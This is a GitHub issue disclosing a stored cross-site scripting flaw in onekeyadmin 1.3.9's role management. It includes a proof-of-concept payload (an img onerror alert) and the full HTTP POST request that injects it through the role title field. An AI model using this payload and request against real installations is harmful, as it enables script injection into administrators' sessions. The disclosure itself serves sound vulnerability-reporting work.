search

keheying / onekeyadmin

基于Thinkphp6+Element的插件化管理系统,网站、小程序、商城、CMS、APP、ERP、API接口一个系统全部搞定,无需脚手架开箱即用!
Apache License 2.0
53 stars 4 forks source link

Background role management - there is a storage xss vulnerability in adding roles #6

Open qbz95aaa opened 1 year ago

qbz95aaa commented 1 year ago
  1. Vulnerability affects product:onekeyadmin
  2. Vulnerability affects version 1.3.9
  3. Vulnerability type:storage xss vulnerability(Cross-site scripting)
  4. Vulnerability Details: <img src=1 onerror=alert("xss");> url http://192.168.3.129:8091/admin1#adminGroup/index image

    `POST /admin1/adminGroup/save HTTP/1.1 Host: 192.168.3.129:8091 Content-Length: 95 Accept: / X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Content-Type: application/json;charset=UTF-8 Origin: http://192.168.3.129:8091 Referer: http://192.168.3.129:8091/admin1/adminGroup/index Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def Connection: close

{"id":"","title":"<img src=1 onerror=alert(\"xss\");>","status":1,"role":[],"theme":"template"}`

image

then you can view xss in url: http://192.168.3.129:8091/admin1#adminGroup/index

image
qbz95aaa commented 1 year ago

find by Chaitin Security Research Lab